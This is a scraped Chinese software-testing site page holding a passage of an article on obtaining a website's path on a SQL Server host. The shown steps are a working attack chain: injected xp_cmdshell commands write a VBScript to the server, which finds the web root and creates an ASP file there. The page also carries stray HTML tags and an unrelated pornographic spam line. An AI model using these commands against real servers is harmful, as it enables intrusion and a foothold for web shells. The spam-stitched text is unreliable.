• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
    • 軟件測試技術
    • 軟件測試博客
    • 軟件測試視頻
    • 開源軟件測試技術
    • 軟件測試論壇
    • 軟件測試沙龍
    • 軟件測試資料下載
    • 軟件測試雜志
    • 軟件測試人才招聘
      暫時沒有公告

    字號: | 推薦給好友 上一篇 | 下一篇

    軟件測試開發技術SQL Server取得網站路徑的幾種方法及比較

    發布: 2009-10-20 10:56 | 作者: 不詳 | 來源: 領測軟件測試網采編 | 查看: 50次 | 進入軟件測試論壇討論

    領測軟件測試網

    第二步:用echo命令寫下面的代碼到c:\中,很多嗎也不算吧

    .....xp_cmdshell ’echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs’;--

    .....xp_cmdshell ’echo Set WshShell = Wscript.createObject("Wscript.Shell")>>c:\read.vbs’

    ;--

    .....

    -------------------read.vbs---------------------------------

    set fso1=createobject("scripting.filesystemobject")

    Set WshShell = Wscript.createObject("Wscript.Shell")

    spa=WshShell.Environment("process")("windir")

    set fil =fso1.opentextfile(spa & "\system32\aa.txt")

    do while not fil.atendofstream

    nr=fil.readline

    if left(nr,4)="Path" then

    pa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)

    exit do

    end if

    loop

    set fil1 =fso1.opentextfile(pa &"\dd.asp",2,true)

    fil1.writeline ""

    ---------------cut here-------------------------------------

    第三步:當然就是執行read.vbs三,這樣我們可以把aa.txt中的內容讀出來找到web站點的實際路徑

    然后寫一個叫dd.asp的文件在web站的根目錄中,能否成功試試就知道咯

    執行http://x.x.x.x/dd.asp

    返回:\xxx

    文章來源于領測軟件測試網 http://www.kjueaiud.com/


    關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備10010545號-5
    技術支持和業務聯系:info@testage.com.cn 電話:010-51297073

    軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>